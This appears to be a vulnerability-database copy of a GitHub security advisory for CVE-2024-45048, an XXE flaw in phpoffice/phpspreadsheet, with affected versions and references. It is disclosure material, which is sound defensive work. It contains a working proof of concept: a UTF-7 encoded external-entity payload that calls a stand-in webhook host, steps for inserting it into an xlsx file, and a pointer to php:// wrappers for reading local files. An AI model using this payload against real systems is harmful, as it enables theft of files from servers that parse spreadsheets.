ghsa-ghg6-32f9-2jp7
Vulnerability from github
8.7 (High) - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Summary
Bypassing the filter allows a XXE-attack. Which is turn allows attacker to obtain contents of local files, even if error reporting muted by @ symbol. (LFI-attack)
Details
Check $pattern = '/encoding="(.*?)"/'; easy to bypass. Just use a single quote symbol '. So payload looks like this:
```
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://example.com/file.dtd"> %xxe;]> ``` If you add this header to any XML file into xlsx-formatted file, such as sharedStrings.xml file, then xxe will execute.
PoC
1) Create simple xlsx file
2) Rename xlsx to zip
3) Go to the zip and open the xl/sharedStrings.xml file in edit mode.
4) Replace <?xml version="1.0" encoding="UTF-8" standalone="yes"?> to
```
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://%webhook%/file.dtd"> %xxe;]>
5) Save `sharedStrings.xml` file and rename zip back to xlsx.
6) Use minimal php code that simply opens this xlsx file:
use PhpOffice\PhpSpreadsheet\IOFactory;
require DIR . '/vendor/autoload.php';
$spreadsheet = IOFactory::load("file.xlsx");
``
7) You will receive the request to yourhttp://%webhook%/file.dtd`
8) Dont't forget that you can use php-wrappers into xxe, some php:// wrapper payload allows fetch local files.
Impact
Read local files
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "phpoffice/phpspreadsheet"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.29.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "phpoffice/phpspreadsheet"
},
"ranges": [
{
"events": [
{
"introduced": "2.2.0"
},
{
"fixed": "2.2.1"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "phpoffice/phpspreadsheet"
},
"ranges": [
{
"events": [
{
"introduced": "2.0.0"
},
{
"fixed": "2.1.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-45048"
],
"database_specific": {
"cwe_ids": [
"CWE-611"
],
"github_reviewed": true,
"github_reviewed_at": "2024-08-29T17:58:27Z",
"nvd_published_at": "2024-08-28T21:15:06Z",
"severity": "HIGH"
},
"details": "### Summary\nBypassing the filter allows a XXE-attack. Which is turn allows attacker to obtain contents of local files, even if error reporting muted by @ symbol. (LFI-attack) \n\n### Details\nCheck ` $pattern = \u0027/encoding=\"(.*?)\"/\u0027;` easy to bypass. Just use a single quote symbol `\u0027`. So payload looks like this:\n```\n\u003c?xml version=\"1.0\" encoding=\u0027UTF-7\u0027 standalone=\"yes\"?\u003e\n+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM \"http://example.com/file.dtd\"\u003e %xxe;]\u003e\n```\nIf you add this header to any XML file into xlsx-formatted file, such as sharedStrings.xml file, then xxe will execute. \n\n### PoC\n1) Create simple xlsx file\n2) Rename xlsx to zip\n3) Go to the zip and open the `xl/sharedStrings.xml` file in edit mode.\n4) Replace `\u003c?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?\u003e` to \n```\n\u003c?xml version=\"1.0\" encoding=\u0027UTF-7\u0027 standalone=\"yes\"?\u003e\n+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM \"http://%webhook%/file.dtd\"\u003e %xxe;]\u003e\n```\n5) Save `sharedStrings.xml` file and rename zip back to xlsx.\n6) Use minimal php code that simply opens this xlsx file:\n```\nuse PhpOffice\\PhpSpreadsheet\\IOFactory;\nrequire __DIR__ . \u0027/vendor/autoload.php\u0027;\n$spreadsheet = IOFactory::load(\"file.xlsx\");\n```\n7) You will receive the request to your `http://%webhook%/file.dtd`\n8) Dont\u0027t forget that you can use php-wrappers into xxe, some php:// wrapper payload allows fetch local files.\n\n### Impact\nRead local files\n",
"id": "GHSA-ghg6-32f9-2jp7",
"modified": "2024-09-13T13:37:31Z",
"published": "2024-08-29T17:58:27Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-ghg6-32f9-2jp7"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45048"
},
{
"type": "WEB",
"url": "https://github.com/PHPOffice/PhpSpreadsheet/commit/bea2d4b30f24bcc8a7712e208d1359e603b45dda"
},
{
"type": "PACKAGE",
"url": "https://github.com/PHPOffice/PhpSpreadsheet"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "XXE in PHPSpreadsheet encoding is returned"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.